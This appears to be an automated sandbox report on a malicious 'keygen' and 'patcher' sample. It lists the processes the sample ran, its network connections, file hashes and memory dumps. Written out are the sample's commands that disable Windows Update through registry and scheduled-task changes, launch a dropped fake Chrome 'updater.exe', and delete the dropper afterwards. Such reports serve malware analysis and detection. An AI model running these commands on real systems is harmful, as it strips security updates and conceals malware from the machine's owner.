reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\patcher.exe"
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.140.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 13.107.253.64:443 | | tcp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| GB | 172.217.169.74:443 | | tcp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 105.193.132.51.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\keygen.exe
| MD5 | eefac124a0e2761c1dcbf7924711e5f1 |
| SHA1 | 9fd030c73442f552c0fc88afaab0b976ea4dccee |
| SHA256 | ea2dd455c7a34b3c742bce0aa7805718fe2d20a84462598f5ebe7d721737166c |
| SHA512 | ff5d4e06574883c0a7eda29226d37a702e384cd0008eca6e3745eb30ac9fcb9db7cd50adddcf9014f04a23e32f24903484d9a94b15f865feb2a2fa68fa7d8e56 |
C:\Users\Admin\AppData\Local\Temp\patcher.exe
| MD5 | 51ffe38c27bf1db8ff1fc599cc029fc2 |
| SHA1 | a8a0efc1937edf30037416f620effbcd4f64dc39 |
| SHA256 | ad22b62fa803e88e5ae79957d8e7f196bc221656e4718ec2d2cf4993143c81aa |
| SHA512 | 50e3346ea6b0cd099ff97e362221eddb8b090f422efe504550fdd21d981e738a54f045bd28a7a825d8443d9e826f3fc5acaaabad221cc1331507730cbf265709 |
C:\Users\Admin\AppData\Local\Temp\patcher.exe
| MD5 | 01b41cf56c39bab0a70b406512ba1e95 |
| SHA1 | 20a7179e6d375af4390e85a8c0ff972a9311873b |
| SHA256 | 5e298e4c33ba67e58933c972782756b06591f2ffad5ff849d44a786cc38c0056 |
| SHA512 | 1d30e4db136fd03d819c6ed11b8246fc30b13e6f65feca29e85591f6ceae88adee9c049f58ed84466698b69b6df196e60cd935034475a04296ea2ba07e12c8c8 |
memory/4732-8-0x0000000002370000-0x0000000002371000-memory.dmp
memory/2040-9-0x0000000074EF0000-0x00000000756A0000-memory.dmp
memory/2040-10-0x00000000025F0000-0x0000000002600000-memory.dmp
memory/2040-11-0x00000000024F0000-0x0000000002526000-memory.dmp
memory/2040-12-0x0000000004CF0000-0x0000000005318000-memory.dmp
memory/2040-13-0x0000000004B00000-0x0000000004B22000-memory.dmp
memory/2040-14-0x0000000005490000-0x00000000054F6000-memory.dmp
memory/2040-15-0x0000000005500000-0x0000000005566000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qcwqnozc.pz4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2040-21-0x0000000005570000-0x00000000058C4000-memory.dmp
memory/4732-26-0x0000000000400000-0x00000000005B4000-memory.dmp
memory/2040-27-0x0000000005B20000-0x0000000005B3E000-memory.dmp
memory/2040-28-0x0000000005BE0000-0x0000000005C2C000-memory.dmp
memory/2040-29-0x00000000025F0000-0x0000000002600000-memory.dmp
memory/2040-30-0x000000007EFC0000-0x000000007EFD0000-memory.dmp
memory/2040-31-0x0000000006130000-0x0000000006162000-memory.dmp
memory/2040-32-0x0000000070700000-0x000000007074C000-memory.dmp
memory/2040-42-0x0000000006110000-0x000000000612E000-memory.dmp
memory/2040-43-0x0000000006D60000-0x0000000006E03000-memory.dmp
memory/2040-44-0x0000000007510000-0x0000000007B8A000-memory.dmp
memory/2040-45-0x0000000006E90000-0x0000000006EAA000-memory.dmp
memory/2040-46-0x0000000006EE0000-0x0000000006EEA000-memory.dmp
memory/2040-48-0x0000000007100000-0x0000000007196000-memory.dmp
memory/2040-49-0x0000000007070000-0x0000000007081000-memory.dmp
memory/2040-50-0x00000000070B0000-0x00000000070BE000-memory.dmp
memory/4732-51-0x0000000002370000-0x0000000002371000-memory.dmp
memory/2040-52-0x00000000070C0000-0x00000000070D4000-memory.dmp
memory/2040-53-0x00000000071A0000-0x00000000071BA000-memory.dmp
memory/2040-54-0x00000000070F0000-0x00000000070F8000-memory.dmp
memory/2040-57-0x0000000074EF0000-0x00000000756A0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
memory/4808-59-0x0000000074EF0000-0x00000000756A0000-memory.dmp
memory/4808-60-0x0000000004D10000-0x0000000004D20000-memory.dmp
memory/4808-61-0x0000000004D10000-0x0000000004D20000-memory.dmp
memory/4808-62-0x0000000005AF0000-0x0000000005E44000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f838d941455c80ca6d87991fc177d72f |
| SHA1 | e8ab41c828bb6699d96e36a487eb0f9788bd5425 |
| SHA256 | 81e0ff9dec6a38fcf7012ce01cf823b0802afe3dd1724f97856999dda374d15c |
| SHA512 | 6f7f5d336af7e4d48ca2415c10f9bf9268304a25a25e398587db0d51fae5a29434f16ec623118a360e4aee47c23653cc434a3c1a415ba02eed355287c658ec61 |
memory/4808-73-0x0000000004D10000-0x0000000004D20000-memory.dmp
memory/4808-74-0x0000000070700000-0x000000007074C000-memory.dmp
memory/4808-85-0x0000000074EF0000-0x00000000756A0000-memory.dmp
memory/3732-91-0x000001A9149D0000-0x000001A914C20000-memory.dmp
memory/3732-93-0x000001A92F4F0000-0x000001A92F740000-memory.dmp
memory/3732-94-0x00007FFC3B380000-0x00007FFC3BE41000-memory.dmp
memory/3732-95-0x000001A916BC0000-0x000001A916BD0000-memory.dmp
memory/3732-96-0x000001A916BC0000-0x000001A916BD0000-memory.dmp
memory/3116-97-0x00007FFC3B380000-0x00007FFC3BE41000-memory.dmp
memory/3116-105-0x00000126DB000000-0x00000126DB022000-memory.dmp
memory/3116-103-0x00000126C2D40000-0x00000126C2D50000-memory.dmp
memory/3116-106-0x00000126C2D40000-0x00000126C2D50000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | fb570355565a04828ff353aa8ed71dfb |
| SHA1 | 11023aadac0edba98b727ea28a73e6deff99d281 |
| SHA256 | 23479438e94e25a1402e9c6506eb87931d11718587ed1b5922bdaf97620f25b7 |
| SHA512 | b8e6a93d550f48588a3519e9cdbcca0a1acebcc45d70dd3b364dc36fd51b5780b37157b017311a6b48ec469509abbd1a54db2d290e1ba84833f73cd68cd74233 |
memory/3116-113-0x00007FFC3B380000-0x00007FFC3BE41000-memory.dmp
memory/3732-117-0x00007FFC3B380000-0x00007FFC3BE41000-memory.dmp
C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
| MD5 | bc4f5c97c22c0b0209534351cd2ea10d |
| SHA1 | 3c0f69f8f8104d0aab0c88494b90c31f2e66b733 |
| SHA256 | f0b4a0b22f9bd061e6c13bbde3c576f1799fb083d1aec4b02740e6fce6d5ba25 |
| SHA512 | 1e68deea126b4aaf57ff50640116fa3c2be0da75b7085d952c16a83eff803903295f54a524cfb96b08574c64fdf1202662811e1e1f41e777b885e0811059b1d2 |
C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
| MD5 | 36c47334298117fae0d37a5f94b5e975 |
| SHA1 | 4c1fedbf9f07ca9b769499dfea191c27e2466893 |
| SHA256 | e8149fbc4474acbda1950ed0a4d57309e233d78a0a7ca94df24beb5e3703610e |
| SHA512 | fc1603efbca21ec24071622e8c9f6bb0dbc74329aa0a1f2aac80179a181e5cc19c96952ea1cd31dfc70e81f4b17382218bc8134f5f483e5f7de49c03c4506145 |